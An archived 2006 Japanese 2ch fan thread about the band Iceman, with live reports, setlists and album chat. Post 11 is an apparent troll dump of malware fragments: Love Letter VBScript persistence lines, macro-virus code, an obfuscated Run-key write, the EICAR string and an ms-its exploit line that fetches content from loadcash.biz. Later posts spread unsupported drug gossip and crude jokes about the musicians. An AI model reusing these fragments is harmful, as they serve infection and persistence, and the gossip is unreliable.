2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【デジロック】 Iceman 5 【アイスマン】

1 :伝説の名無しさん:2006/08/17(木) 03:29:44
ここはIcemanをロック的視点で語ろう、という趣旨のスレッドです。
だから各ソロの話題は程ほどに。

【注意事項】
・「デジロック」の定義についての議論はここでは意味がないのであまりやらないように。
・腐女子ネタ・雰囲気は持ちこむべからず。
・他スレ(特に邦楽各ソロスレ)の悪口は言わない・ココをソロ語り避難所にしない。
・熱く語るのはよろしいが、住人同士は仲良くしる。

前スレ
http://music6.2ch.net/test/read.cgi/legend/1132064349/

2 :伝説の名無しさん:2006/08/17(木) 04:14:31
川o・-・)あばばばば

3 :伝説の名無しさん:2006/08/17(木) 11:23:53
>>1

黒田の10周年ライブでやった「黎明」を聞きたかったよ。


4 :伝説の名無しさん:2006/08/18(金) 05:22:37
>>1に追加したい
他スレでは当たり前の隠語・略語・半角カナの多用も、ここでは控えるように。


最近はマシになってきたけど、たまに流入してきて荒れるんだよなー・・・

5 :伝説の名無しさん:2006/08/19(土) 01:37:27
じゃ、それに
他スレの隠語・略語・半角カナの多用について、ここで言及しない
も加えてくれ

互いに干渉しないようにすればいいのに
こっちに持ち込むやつがいるからさ

6 :伝説の名無しさん:2006/08/20(日) 01:18:53
アゲトクゾ

7 :伝説の名無しさん:2006/08/20(日) 02:45:49
漏れって使うな
きめえから

8 :伝説の名無しさん:2006/08/20(日) 04:30:43
も…漏れる

9 :伝説の名無しさん:2006/08/20(日) 05:03:09
尿 漏れ

10 :パロマ:2006/08/20(日) 09:06:14
ガス漏れ

11 :伝説の名無しさん:2006/08/20(日) 11:02:27
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ܷܵܶ

12 :伝説の名無しさん:2006/08/20(日) 17:41:12
黒田が伊藤と再コラボするにあたり、例えばこれが浅倉だったらどうよ?黒田スレでと問うてみたところ、伊藤>>>>>>>>>>>浅倉、もしくはどっちも嫌、だそうですが、皆さんはいかがですか?

13 :伝説の名無しさん:2006/08/20(日) 21:53:43
黒田と浅倉がコラボしたところで何も生まれないだろ
なんとういうか世界観が違いすぎる

つか黒田スレでそんなアンケート取ったところで結果は最初から見えてると思うが

14 :伝説の名無しさん:2006/08/20(日) 22:19:06
うーん。まあ別にコラボして欲しいとは思ってないけど、浅倉人気が意外とないのに、ちょっと切なくなりました。


すいません…次の話題行って下さい。

15 :伝説の名無しさん:2006/08/21(月) 01:34:02
伊藤と浅倉はいっぱい生まれそうだが
黒田と浅倉は駄目そう
音楽の捉え方が違うと思う

16 :伝説の名無しさん:2006/08/21(月) 02:28:32
浅倉は伊藤をあんなに評価してたじゃないか
PCMも伝授したわけだし
声も浅倉好みだったわけだし(多分、音域とかが

伊藤の最近のソロ曲聞いてると
伊藤も自分のボーカルは曲の一部的な考えなんじゃないかと思った
それが浅倉と一緒なんだなと
だから自分じゃないボーカルを求めることがあるわけなんだな。きっと。

17 :伝説の名無しさん:2006/08/21(月) 14:05:45
>16
だから伊藤はバンドが好きなんだと?

18 :伝説の名無しさん:2006/08/21(月) 14:34:34
15.16を総合するとつまり
伊藤黒田バンドは上手く行きそうにないってことか?


19 :伝説の名無しさん:2006/08/21(月) 15:29:23
さあ、それはわからんな
伊藤や他のメンバーが黒田にどういう曲を書いてくるのかまだわからんし
黒田が自分で書いたんだったらソロと変わらないわけだから
結局去年のアルバムの伊藤コラボ曲くらいのものにしかならないだろうし
見えないんだよなーまだどうにも。
上手くいかないってことはないだろうが、
なんか新しいものの期待は浅倉とやること以下。

20 :伝説の名無しさん:2006/08/23(水) 11:46:35
個人的に、氷男の時は黒田の為というよりは氷男の世界を表現する曲
という感じがしたから浅倉が黒田の為にどんな曲を書くのかは興味はある

しかしあの2人は音楽というより人間的に合わない気がする

伊藤は最近黒田とはちょっと差が開きすぎてるんじゃないかと思う
だから今更組むのと微妙な感じがすることは否めない

21 :伝説の名無しさん:2006/08/28(月) 05:27:13
今日久々にOUT入れてGATE4枚聴いたけど
究極だなぁ、3人が

22 :伝説の名無しさん:2006/08/29(火) 01:41:10
スケアクロウか。どんな音になるんだろうな。
オレは黒田のバラードが好きだからちょっと趣味と違うかもしれん。だがもっさ応援するぞ。

個人的には伊藤のコーラスとダブルボーカルに期待する。
オーイェーィ ミスタッディー! オンドロゥ- アサマッディー!

23 :伝説の名無しさん :2006/08/29(火) 19:02:31
何か有志が集まってIceman 10周年の記念イベントやるみたいよ。
Tributeだって。

24 :伝説の名無しさん:2006/08/29(火) 20:22:26
>>23
kwsk

25 :伝説の名無しさん:2006/08/29(火) 21:02:59
ミクシだろ?
ちょっと興味はあるが地方人なので行けない

勇者居たらレポヨロ

26 :伝説の名無しさん:2006/08/30(水) 00:33:37
>23
マジネタでつか?

27 :伝説の名無しさん:2006/08/30(水) 01:45:36
ぐはぁぁぁぁちょっと興味あるけど知り合いに会いそうで怖いぃぃいいwwwww

28 :伝説の名無しさん:2006/08/30(水) 02:23:57
参加したいが、ミクシやってねぇorz

29 :伝説の名無しさん:2006/08/30(水) 02:24:45
これか
ttp://imt.imasara-kingdom.net/

30 :伝説の名無しさん :2006/08/30(水) 10:35:42
↑試聴あるけど、クオリティ高くね?
何かよさげな感じがするのだが・・・。

31 :伝説の名無しさん:2006/08/30(水) 12:57:59
ごめん、自演?
お約束だから聞いとく

32 :30:2006/08/30(水) 16:35:38
>>31
しがない地方ものだから。
気にはなるけど行けない。

33 :伝説の名無しさん:2006/08/31(木) 04:15:24
俺はクオリティ低いと思ったが。
期待する度合いが高すぎ?

34 :伝説の名無しさん:2006/08/31(木) 09:26:12
自分も元が元なだけに多少まともでもクオリティ高いとは思えね


35 :伝説の名無しさん :2006/08/31(木) 10:21:28
まぁ、結構いけてるほうじゃない?
プレイ○ーズ王国で聞くものなんかに比べあwせdrftgyふじこ

36 :伝説の名無しさん:2006/08/31(木) 19:26:00
すがわ(ry

37 :伝説の名無しさん:2006/09/01(金) 23:34:27
>>28
いまは色んな板で招待してもらえるぞ

38 :伝説の名無しさん:2006/09/03(日) 00:40:52
マトリクスで浅倉も目尻にメイクしてたのかと気付いた
夏の終わりの深夜。

おまりらいかがお過ごしでしょうか

39 :伝説の名無しさん:2006/09/03(日) 00:48:36
目尻のメイクが小じわに見えると思い続けて、いく数年

おまりらいかがお過ごしでしょうか

40 :伝説の名無しさん:2006/09/03(日) 01:18:41
パクってんじゃねーよ禿



黒田がアッー!なのはガチ

41 :伝説の名無しさん:2006/09/03(日) 19:37:30
そんな藻舞はsageてくれよな、ヴォケwww

42 :伝説の名無しさん:2006/09/03(日) 19:51:39
>40
>39程度でパクったって言うなら、お前が使った「アッー!」もパクりだなwwww
つーか、こんなのでパクったどうのってお前は起源を主張しまくりたい某国の人間かよw

43 :伝説の名無しさん:2006/09/03(日) 20:07:24
・腐女子ネタ・雰囲気は持ちこむべからず。
・他スレでは当たり前の隠語・略語・半角カナ・wの多用も、ここでは控えるように。


44 :伝説の名無しさん:2006/09/03(日) 20:41:54
>>42


必死になるお前も痛すぎw このキモオタ共がwwwww

45 :伝説の名無しさん:2006/09/04(月) 18:46:32
せーんのー!!!!!!


ねがーいはー!!!!!!!!!!!!!!!!!!!!

46 :伝説の名無しさん:2006/09/04(月) 22:03:47
なんだっけそれ

47 :伝説の名無しさん:2006/09/04(月) 22:39:25
>45
声デカすぎだからwww

48 :45:2006/09/04(月) 22:51:45
>>46

ぼぉーーくぅ〜だ〜けぇ〜〜〜〜〜〜………
(ぼぉーーくぅ〜だ〜けーーーーーー)

みぃーーつぅ〜め〜てぇ〜〜〜〜〜〜………
(みぃーーつぅ〜め〜てーーーーーーーーーーーーーーーーーーーーーーーーーーーーー
)


すぅーーなぁ〜ぉ〜に(ry
(すーなー(ry

49 :伝説の名無しさん:2006/09/05(火) 00:02:55
思い出したWish Matrixだ
>>48は御大の曲だろ

50 :伝説の名無しさん:2006/09/05(火) 01:39:31
ダイヤのっ! 輝きさえっ!

51 :伝説の名無しさん:2006/09/05(火) 01:46:17
>>50
ジュエリーエンジェル アクセスじゃん

52 :伝説の名無しさん:2006/09/05(火) 09:00:35
ほーしのー すきーまにーー

53 :伝説の名無しさん:2006/09/06(水) 07:14:03


54 :伝説の名無しさん:2006/09/06(水) 22:12:25
いーろーのーなーい せーだーいにー

55 :伝説の名無しさん:2006/09/06(水) 23:11:40
歌詞厨テラウザス

56 :伝説の名無しさん:2006/09/06(水) 23:40:26
おまぇもテラウザス





復活しないの?

57 :伝説の名無しさん:2006/09/07(木) 07:19:47
ねむりさえー!!!!!性になるまちでー!!!!!!!!

58 :伝説の名無しさん:2006/09/07(木) 07:48:48
しかるべきときの波紋ー 割れた未来はきりとらーれーーー

>>56
浅倉抜きで復活w

59 :伝説の名無しさん:2006/09/07(木) 20:21:16
浅倉と伊藤と黒田抜きで復活

60 :伝説の名無しさん:2006/09/07(木) 23:22:14
4人目のアイスマンは雛だとかいってる時期もありました

61 :伝説の名無しさん:2006/09/08(金) 01:03:48
アサクラ
イトウ
スキャット

ンジョン


62 :あいすまん ◆FZMb0pvYpg :2006/09/08(金) 05:13:54
↑嘘はいかんよ君ぃ





Itouno
Chinchin
Eating!!
Michihiro
Asakura
Nakayoku
!ーッア


63 :伝説の名無しさん:2006/09/08(金) 11:04:20
10年たった今でもこの曲が好きだな
ttp://www.youtube.com/watch?v=zSnJ6dtBR34

64 :伝説の名無しさん:2006/09/08(金) 19:43:38
ちんちんイーティングワロスwwwwwwwww


マトリクースて 雌はガムかみながら踊ってたのか!
しらなかったぉ

65 :伝説の名無しさん:2006/09/11(月) 13:16:21
誰か>>29のトリビュートライブに行った
椰子は居ないのか?

行った勇者はぜひ報告ヨロ。

66 :伝説の名無しさん :2006/09/11(月) 20:57:47
いったYO。
なんか物凄い曲数やってた。20曲くらい?
クオリティは高かったよ。Wishとか凄くヨカッタ。
つーか、キーボードの人が・・・ちょっとカコイイ。
客席も結構埋まってたし、ノリノリで楽しかった。以上、マジレス。

67 :sage:2006/09/11(月) 21:42:27
きーぼ、たくさんいたけど、どれだ? orz


68 :66:2006/09/11(月) 22:11:59
左の白い人。なんかプロっぽかった。
しょるきー持ってくれたらもっとヨカッタのに・・・。


69 :伝説の名無しさん:2006/09/12(火) 01:03:26
誰かレポ&写真UPきぼn

70 :伝説の名無しさん:2006/09/14(木) 12:13:46
ミクシィから転載。セットリストだそうだ。

1.8番目の罪
2.BREATHLESS NIGHT SLIDER
3.Edge of the season
4.PERFECT FUTURE?
5.黎明
6.Wish Matrix
7.Image of Tomorrow
8.LOST COMPLEX
9.Neo Age
10.Mr.D
11.GALAXY GANG
12.GATE T
13.Strike Back of PSYCO
14.Theme of 「Iceman Tribute」
15.FATE WEATHER
16.Shining Collection
17.FINAL PRAYER
18.DARK HALF〜TOUCH YOUR DARKNESS〜

EN1.Dear My Friend〜make your shine way
EN2.Genetic Bomb

71 :伝説の名無しさん:2006/09/15(金) 17:08:30
ひじょうにつまらないすれになってしもうた.....

72 :伝説の名無しさん:2006/09/15(金) 23:06:33
BREATHLESS NIGHT SLIDER 最高

73 :伝説の名無しさん:2006/09/15(金) 23:31:20
× BREATHLESS NIGHT SLIDER


○ BREATHLESS NEET SLIDER






_ ∩
( ゚∀゚)彡黒田!黒田!
⊂彡


74 :伝説の名無しさん:2006/09/16(土) 14:09:05
98年に戻りたい

75 :伝説の名無しさん:2006/09/16(土) 15:22:15
>>74
おまえは俺だ

76 :伝説の名無しさん:2006/09/16(土) 20:07:53
いつか死んでも
結局氷男のライブ行けずじまいで人生の幕を降ろしたことを非常に後悔し
幽霊になって代々木体育館あたりにたむろしている予感

77 :伝説の名無しさん:2006/09/18(月) 01:28:54
昨日の伊藤ライブのレポ誰も書かないの?
Iceman関連曲沢山やったよ。
大満足だった。

78 :伝説の名無しさん:2006/09/18(月) 02:03:57
>77
その後のソロ曲ライブがネ申すぎてすっかり忘れてた
D/デビクラ/スペドリ/レモンティーな
デビクラもスペドリも隣に浅倉の幻影が見えるような曲なのに
完全生音でやってたなw

79 :伝説の名無しさん:2006/09/20(水) 13:38:06
末期というか99年あたりはお薬やってる雰囲気アリアリだったな・・・
白あたりなんか歌詞にモロ出しちゃってるのが笑える
お薬でもないとあんなハイペースで仕事できんだろうけど
いたってフツーの人である黒田がついていけなくなったのもよくわかる

80 :伝説の名無しさん:2006/09/20(水) 15:17:45
>77
アンプラグドっていうからIM曲やらないかと思ってたから驚いた
一連の流れは99年にタイムスリップしたみたいで楽しかったな

そういえばもうすぐ浅倉のリメイクライブだけど
IMは何曲くらい演奏してくれるのか今からwktk!

81 :伝説の名無しさん:2006/09/20(水) 15:43:49
こないだのフカーツライヌはDVDになりますか?



あと扉VいつになったらDVDになりますか?

82 :伝説の名無しさん:2006/09/21(木) 07:47:40
ようつべで・・・浅倉名義でジェネボムってあったから
何かと思ったら・・・



ヴォーカルパートぜんぶ一人で歌ってるのな・・・



脳みそが目からぶっ飛んだwwwww    orz

83 :伝説の名無しさん:2006/09/21(木) 16:04:09
俺は好きだがな>1人ジェネボム

84 :伝説の名無しさん:2006/09/22(金) 02:24:22
目も耳も痛かったが・・・w


ちょっと前にCSとかでソロライヴの放送あったけど
見た目きついよねもう

85 :伝説の名無しさん:2006/09/22(金) 21:57:17
珍しいね、ここには浅倉アンチがいるのか
伊藤と黒田で擬似アイスマンやればいいんじゃないかなって感じだね
浅倉は興味が失せると何も作れない人だしw
アイスマンアンチのアクセスヲタも一部にいるしね

86 :伝説の名無しさん:2006/09/23(土) 00:30:43
対抗するわけじゃないが
こないだの伊藤ライブで久々に黒田を見たが
あんな顔だったか?とリアルに考え込んでしまった
身体薄いのは相変わらずなんだが…なんつーか、劣化した

まあそれは他の2人も同じなんだがなwww
俺は伊藤贔屓だしずっと見てるから伊藤はどうなのかわからんが
充分劣化してると思うし

87 :伝説の名無しさん:2006/09/23(土) 00:57:56
浅倉の見た目がきついと思っただけでアンチ扱いされるのはちょっと心外だな。
音楽は今でも大好きだし、見た目きついと思っても自分は充分妖精だと思う。
まあ3人とも劣化したわけじゃなく老化しただけだ。
今でも音楽的に一番好きなのは氷男だが
黒田贔屓なせいか、アーティスト黒田単体で見たら今の方がいいと思う。
そして浅倉無しで疑似アイスマンが出来るとは思えんよ。
あの二人にはもっと新しいことを期待してる。

88 :伝説の名無しさん:2006/09/23(土) 01:08:27
>>87
どっちかっつうと目も「耳も」痛かった
っていう表現でアンチ扱いさせて頂いたんだけどね、
決め付けて申し訳ない

ちなみに浅倉の歌唱力がグダグダなのは禿げ上がる程同意
あれは萎えるw

89 :84:2006/09/23(土) 01:15:50
>>85
87と同意見だが
ここでアンチとか脊髄反射しなくても・・・

まあ浅倉を全面マンセーする気がないのは確かだが

90 :伝説の名無しさん:2006/09/23(土) 01:26:10
>>89
脊髄反射したつもりはないよ
てっきり氷男スレには、復活を夢見るファンが集まっているものだと思っていたもので
そういう人もいるんだなあと思ってね、珍しくて

ちなみに自分は氷ヲタでもなんでもないw
紛れ込んで申し訳なかった

91 :伝説の名無しさん:2006/09/23(土) 12:54:15
復活を期待してるけど
TMやアクセスみたくなったらやだなぁ


って思うんだよね(´・ω・`)

92 :伝説の名無しさん:2006/09/23(土) 21:53:58
妖精さんはまず中年太りをどうにかしないとなー

93 :伝説の名無しさん:2006/09/24(日) 01:46:57
浅倉ソロでやった曲
マトリクス ストラバ ジェネボム 
ストラバは泣きたくなるくらいうれしかった
自分はなんだかんだで氷ヲタだと思った

サポートのドラムが、デジミュまでサポートしてた柴ちゃんだったので
「柴ちゃんが(扉シリーズの)ストラバ叩いてる!」というのにも感動してしまった 



94 :伝説の名無しさん:2006/09/24(日) 19:10:53
ストラバってなんだっけ

95 :伝説の名無しさん:2006/09/24(日) 19:11:36
ああ、ストライクバックオブサイコか
んな略し方生まれて初めて見たwwwww

96 :伝説の名無しさん:2006/09/24(日) 22:04:58
普通ストラバなんて略さねー
「サイコ」で通じる

97 :伝説の名無しさん:2006/09/24(日) 23:07:44
略し方なんでどうでもいい

98 :伝説の名無しさん:2006/09/25(月) 00:43:20
>93
柴ちゃんって扉では叩いてないんだっけ?

三曲だけでもかなり楽しかった。やっぱIMの曲はイイと思った
三人揃った氷男のフルライブ行きてー!



99 :伝説の名無しさん:2006/09/25(月) 01:34:23
>98
つか扉はサポなし

100 :伝説の名無しさん:2006/09/25(月) 17:31:17
>>96
ブサイコとかなw

101 :伝説の名無しさん:2006/09/25(月) 21:29:52
誰が自己紹介しろと。

102 :伝説の名無しさん:2006/09/25(月) 23:34:15
>99
そうか。IMは理性ふりきってしまうことが多かったので
記憶から抜け落ちていたな

103 :伝説の名無しさん:2006/09/26(火) 13:02:01
ライヴ後の屍累々がキモかった

いつぞやのZepp2階、悲鳴・叫び声のうるさかったこと・・・w

104 :伝説の名無しさん:2006/09/26(火) 19:06:17
>103
>ライヴ後の屍累々がキモかった
っていうから思い出しちまったじゃねぇかよ
ライブ後にベージュのブラ丸出しで屍状態だったコニーを
本当にあれはキモかった

105 :伝説の名無しさん:2006/09/26(火) 21:06:29
コニーって誰?有名なヲタ?

106 :伝説の名無しさん:2006/09/26(火) 23:15:47
>>105
コニー【こにい】[名](同人コミケ)
KONISHIKIのごとく太っている同人女のこと。
リキシレディと同じく、言動がまともなデブ女のことはコニーとは呼ばない。

類義語:リキシレディ
参照:同人女

以上、2典より引用。

107 :伝説の名無しさん:2006/09/27(水) 00:23:46
解説あんがと

108 :伝説の名無しさん:2006/09/28(木) 13:59:33
>>79
え、マジ?薬やってたの?
たしかに意味不明な感じあるけども

109 :伝説の名無しさん:2006/09/28(木) 17:51:23
>>108
多少そっちの経験ある人間からするとバレバレっすお
あれは想像とかちょっと雰囲気出してみました〜って程度じゃ無理

110 :伝説の名無しさん:2006/09/28(木) 18:03:55
断言するところが凄いなw

薬やってる人って何か選民意識みたいなのあるのか?プロを舐めすぎだろ。

111 :伝説の名無しさん:2006/09/28(木) 18:39:58
校則をやぶったり学校をサボったりするのがカコイイ!と同じ事なんじゃねーの?
クスリに手出してる俺ってカコイイ!みたいな>>109


112 :伝説の名無しさん:2006/09/28(木) 21:26:17
それってイタウの事??
自分は信じないけど

113 :伝説の名無しさん:2006/09/28(木) 21:45:50
浅倉も

114 :伝説の名無しさん:2006/09/28(木) 21:46:39
>>110
そうやって頑張るあたりが逆にプロを舐めてるよ
業界じゃ珍しくも無いんだから強がるなよー

115 :伝説の名無しさん:2006/09/28(木) 21:54:52
お前らアホですか

116 :伝説の名無しさん:2006/09/28(木) 23:01:29
でも煙草を吸うよりマリファナやった方が体への負担は少ないんだっけ
煙草なんてほんと喘息なのにやめらんねーしw

117 :伝説の名無しさん:2006/09/28(木) 23:29:00
当時はキノコも合法だったな
良い時代だった・・・

118 :伝説の名無しさん:2006/09/28(木) 23:36:30
取り敢えずおくすりやってる人、もう分かったからw

119 :伝説の名無しさん:2006/09/28(木) 23:39:24
タウリンでいいじゃん
徹夜明けにタウリン入れると驚くほどテンション上がるし              もういいか

120 :伝説の名無しさん:2006/09/29(金) 13:22:37
ファイトー!! いっっぱ〜つ!!

121 :伝説の名無しさん:2006/09/29(金) 21:39:59
タウリン1gな。

122 :伝説の名無しさん:2006/09/30(土) 17:29:34
タウリン1kgな。

123 :伝説の名無しさん:2006/09/30(土) 17:46:42
白盤のドープライトとか、そのまんまモロだよね
ファンはウブなおこちゃまが多かったからほのめかしたくてしょうがない感じだなって
印象を受けた当時

124 :伝説の名無しさん:2006/09/30(土) 17:48:37
俺は余りにもモロすぎて逆に嘘っぽいと思ったもんだ

125 :伝説の名無しさん:2006/09/30(土) 19:24:10
白がコンセプトだったから成る程、くらいのもんだよな普通。

126 :伝説の名無しさん:2006/09/30(土) 19:54:03



脳 内 麻 薬 は 確 実





127 :伝説の名無しさん:2006/09/30(土) 20:36:07
さすがに当時そういう話はできなかったわ・・・

128 :伝説の名無しさん:2006/09/30(土) 21:58:04
魔薬だぁ?コノヤロゥ!!てめぇがシャブれよ!! ↓↓

129 :伝説の名無しさん:2006/09/30(土) 22:02:31
しゃぶしゃぶおいしい

130 :伝説の名無しさん:2006/09/30(土) 22:14:28
>126
そ れ だ w
聴くだけでもアドレナリンが出てくるからな

131 :伝説の名無しさん:2006/10/01(日) 00:26:40
元ジュディマリのYUKIも大麻スキーだそうだ
あれで歌詞がぱーっと浮かぶんだって
ほんとにそういうのが当たり前の世界なのね

132 :伝説の名無しさん:2006/10/01(日) 08:23:07
はいはい事情通事情通

133 :伝説の名無しさん:2006/10/01(日) 08:47:40
メンヘラの自作自演だからホットケ

134 :伝説の名無しさん:2006/10/01(日) 08:51:54
>>133
おまいこそ脳みそ大丈夫か?

135 :伝説の名無しさん:2006/10/01(日) 09:53:40
いい加減、内容がスレ違いだよ・・・

ところで黄版を聴いた事が無いんだが、聴いてみる価値あるか教えてくれまいか?

136 :伝説の名無しさん:2006/10/01(日) 14:37:15
価値は自分で聴いてみて決めるもんだろw

まー必聴ってほどじゃないのは確かだな
オクで高額はたいて入手しなきゃならないほどのもんではない
話の種に、一応聴いてみたら?とは思うが、期待しすぎないほうがいい
ほとんどカラオケじゃねーか!って曲もあるし・・・w
期待してたアイスブレイカーはZeppの神アレンジに全然及ばなくて
がっかりした記憶があるなぁ

必聴つったらクレイジージェットの横アリ配布版のほうがマストだと思うね
アルバムver.とくらべると非常にシンプルな良さがある

137 :伝説の名無しさん:2006/10/01(日) 14:50:29
黄盤ってアウトの事か
自分氷男リアルタイムじゃなかったんで、
そのゼップのネ申アレンジっての聞いてみたいな

138 :伝説の名無しさん:2006/10/01(日) 16:12:19
黄盤はスペースドリーマーが神なわけだが

139 :伝説の名無しさん:2006/10/01(日) 16:27:02
outでのDEEP WILDはネ申

140 :伝説の名無しさん:2006/10/01(日) 18:46:21
黄盤って初回限定のだよな
通常版は白っぽいし

141 :伝説の名無しさん:2006/10/01(日) 18:57:33
通常版てあるの?
白っぽいのなんてアナログ盤しか見たこと無い

142 :伝説の名無しさん:2006/10/01(日) 19:42:54
俺が持ってるのはケースが黄緑で中身はシルバーなんだが、これ初回盤?
中古屋で買ったんだけど

143 :伝説の名無しさん:2006/10/01(日) 21:33:34
黄緑っつーか……バスクリン入れた風呂の色だよなあれ

144 :伝説の名無しさん:2006/10/01(日) 21:59:38
色がイマイチだったし、かえって珍しいと思って通常盤買った>out

145 :伝説の名無しさん:2006/10/02(月) 00:19:58
>>142
それが初回盤
通常盤は透明プラケースで表紙部分のライナーなし(盤面が丸見え)
横の見出しと背表紙にだけ白系のライナー入ってる
アナログ盤のイメージに近いよ

盤面はシルバーに透明な印刷で共通だね

146 :伝説の名無しさん:2006/10/02(月) 18:25:20
なんかスレ内容につられてOUTを久々に聴いてる。

良いなぁ、素晴らしい。

147 :伝説の名無しさん:2006/10/02(月) 23:30:24
ZeppのICEBREAKER、FATE WEATHERは神アレンジだったが


ロスコンのハイライトである伊藤ソロで、爆裂に狂ったチューニング・・・
何度聞いても爆ワロwwwww
あれはいったいなんだったんだろうな

148 :伝説の名無しさん:2006/10/03(火) 01:15:20
Zepp二日間行ったはずなのに全然覚えてないよ…orz
あれって音源化してないよねえ?あるなら聞きたいが。
ちなみに自分はMr.Dのclub crusing ver.が神だと言ってみる。

149 :伝説の名無しさん:2006/10/03(火) 04:12:30
浅倉があわてて?手弾きで音重ねてフォローしてたけど
どうにもごまかしようがなかったようで・・・<ロスコンソロ

150 :伝説の名無しさん:2006/10/03(火) 16:58:18
扉代々木初日のシャイコレのリフも、チューニング狂ってて聞くに耐えなかった覚えが…w

151 :伝説の名無しさん:2006/10/06(金) 14:26:49
突然思い出した
キャンディキャンディストラッシュってありましたね

152 :伝説の名無しさん:2006/10/06(金) 14:50:29
バージンビートのパクリっすよ!!wwww
今思うとよくあんなことができたもんだなwww
武道館で、脚立wwwww


今ライブビデオでFate Weather見たんだが超かっこいいorz
伊藤のギターもむちゃくちゃだけどパフォーマンス込みで全然かっこいいではないかorz
なんだか落ち込んだ IM見てえええええ

153 :伝説の名無しさん:2006/10/06(金) 20:18:09
ひぐっさんと竹内と誰だっけ?

154 :伝説の名無しさん:2006/10/06(金) 23:06:26
ほんだ

155 :伝説の名無しさん:2006/10/06(金) 23:52:56
おk

156 :伝説の名無しさん:2006/10/07(土) 04:57:33
ウガでサイコ歌おうとしたらイントロで萎えた('A`) ナニヨアレ

157 :伝説の名無しさん:2006/10/07(土) 19:13:33
>156
カラオケで音のクオリティを求めてはいけない


158 :伝説の名無しさん:2006/10/08(日) 07:06:58
>>157
だってよぉ〜アイスマンよりマイナーなレイジーナックのがいい音、しかも
原曲に近いんだぜ?
やってらんねーよ!!!
(・∀・#)ムカムカ

159 :伝説の名無しさん:2006/10/08(日) 22:13:17
誰だよ「ゲイ」スポ+の浅倉スレでこれかいたの アロスwwwww


【アッー!サクラダイスケの由来】
ヤマハ社員に扮した浅倉がTMNのサポートメンバーに抜擢

「シンセベースをやれ」 「やれば小室さんの服のおさがりをいただけるんですね」などの会話を経てライブに出演。

ホモキャラをほじくられ、「大ちゃんは男が好きだからなぁ」などと罵られる

ボーカル貴水と出会い「アッー アッー!」とaccess結成

ファンに演奏を見せながら曲中で貴水とのキスシーン(演出)を見せる。「気持ちいい!」と悶えながらソロコーナーで演奏する。

このあと、貴水が歌いながら、浅倉の背後から肩を抱く。「アッ、アッ、アッ、アッ!」と浅倉はキーボードを弾きながら頭をカックンカックン振る。

Icemanを結成し3Pが始まる。演奏するばかりだった浅倉が一転、攻勢に出て、Icemanを解散して歌い始める。
小刻みに腰を振りながら、「アッー、アッー、精米!」と叫んで、浅倉もファンの前で勢い良く熱唱。あと愛犬のケツに指刺さっちゃった(笑)って ラジオで楽しそうに語ってたらしい。
――――――All:173―-y 名無しさん@恐縮です 2006/10/08(日) 18:38:27ID:E8g9wZJo0


160 :伝説の名無しさん:2006/10/08(日) 23:04:31
>>159
http://blog.livedoor.jp/yurai183/

161 :伝説の名無しさん:2006/10/10(火) 00:35:30
浅倉LIVEはウィッシュ・シャイコレ・サイコ・アイブラと扉から4曲も。

162 :伝説の名無しさん:2006/10/10(火) 01:11:43
ボーカル不在でやられても全然うれしくないのは俺だけ?w
浅倉がボーカルやるんでしょ?

163 :伝説の名無しさん:2006/10/10(火) 01:47:19
ボーカル居なくてもギターが上手かったりしてオイシイところはあるww
声は脳内変換・・・出来たらいいのにな・・・orz

164 :伝説の名無しさん:2006/10/10(火) 01:58:43
ぶっちゃけ黒田いらねーじゃんと思ったw
伊藤はギターというよりコーラスなどで必要だがw

165 :伝説の名無しさん:2006/10/10(火) 05:56:21
DAから離れて数年経つと、浅倉がIMの曲うたってるのが激しくキモく感じるし
短足小人体型なのに顔はドンドン老けてて・・・もはやお笑いにしか orz

166 :伝説の名無しさん:2006/10/10(火) 09:43:32
はいはい

167 :伝説の名無しさん:2006/10/10(火) 11:06:40
>>164
黒田いらねーってなったから扉があんな状態になったんだろwww

168 :伝説の名無しさん:2006/10/10(火) 13:01:56
判ったから黙ってカカシでも聞いてろよ

169 :伝説の名無しさん:2006/10/10(火) 14:08:32
しかし今ソロ活動でやるとしたら黒田より浅倉の方が合ってると思う。
仮に黒田が今ソロでシャイコレとかサイコをアレンジして歌うと言われてもどうだか。

170 :伝説の名無しさん:2006/10/10(火) 18:44:21
確かに浅倉のほうがやるとしたら合っているのだが
やはり黒田ボーカルにこだわってしまうというか…
浅倉にやられても嬉しくない寧ろ悲しい

171 :伝説の名無しさん:2006/10/10(火) 18:48:32
黒田がオケ流して歌えばいいじゃんw
アレンジしないでさ 当時が蘇るだろw

172 :伝説の名無しさん:2006/10/10(火) 19:55:37
なんで悲しいのか分からない
そんなに嫌なら単に聞かなきゃいいんでは?

黒田の声が良いとか言っても本人が歌わないならしょうがないし
浅倉のソロライブだから浅倉本人が歌うのは当たり前な気がするんだが


173 :伝説の名無しさん:2006/10/10(火) 20:02:57
>>170が部屋でアイスマンのCD聞いてれば済む話じゃん・・・

174 :伝説の名無しさん:2006/10/10(火) 20:27:50
西川がプレミアで他アーティストの曲カヴァーしてたのとは
